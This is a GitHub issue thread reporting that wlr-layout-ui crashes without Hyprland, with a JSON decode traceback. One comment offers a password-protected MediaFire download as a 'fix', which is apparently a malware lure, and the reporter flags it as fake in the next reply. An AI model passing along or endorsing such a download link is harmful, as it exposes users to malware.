### ISSUE TITLE
Doesn't work w/o Hyprland (anymore?)

### ISSUE THREAD

**Issue by milgner** [fdev31/wlr-layout-ui#12]
On startup, the application tries to call `hyprctl -j monitors all` and parse the output as JSON. But when not on Hyprland, the output will not be JSON but an error message which in turn crashes the app.

```
Traceback (most recent call last):
  File "/nix/store/n98ggbbd4f5xizhdm32qvqdwmzj0sm07-wlr-layout-ui-1.6.14/bin/.wlrlui-wrapped", line 9, in <module>
    sys.exit(main())
             ^^^^^^
  File "/nix/store/n98ggbbd4f5xizhdm32qvqdwmzj0sm07-wlr-layout-ui-1.6.14/lib/python3.12/site-packages/wlr_layout_ui/__init__.py", line 69, in main
    load()
  File "/nix/store/n98ggbbd4f5xizhdm32qvqdwmzj0sm07-wlr-layout-ui-1.6.14/lib/python3.12/site-packages/wlr_layout_ui/screens.py", line 67, in load
    load_from_hyprctl()
  File "/nix/store/n98ggbbd4f5xizhdm32qvqdwmzj0sm07-wlr-layout-ui-1.6.14/lib/python3.12/site-packages/wlr_layout_ui/screens.py", line 26, in load_from_hyprctl
    monitors = json.loads(subprocess.getoutput("hyprctl -j monitors all"))
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/nix/store/04gg5w1s662l329a8kh9xcwyp0k64v5a-python3-3.12.4/lib/python3.12/json/__init__.py", line 346, in loads
    return _default_decoder.decode(s)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/nix/store/04gg5w1s662l329a8kh9xcwyp0k64v5a-python3-3.12.4/lib/python3.12/json/decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/nix/store/04gg5w1s662l329a8kh9xcwyp0k64v5a-python3-3.12.4/lib/python3.12/json/decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
```

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by milgner** [comment]
For others stumbling upon this: the reply above is obviously fake. I already submitted a report for phishing/malware distribution.
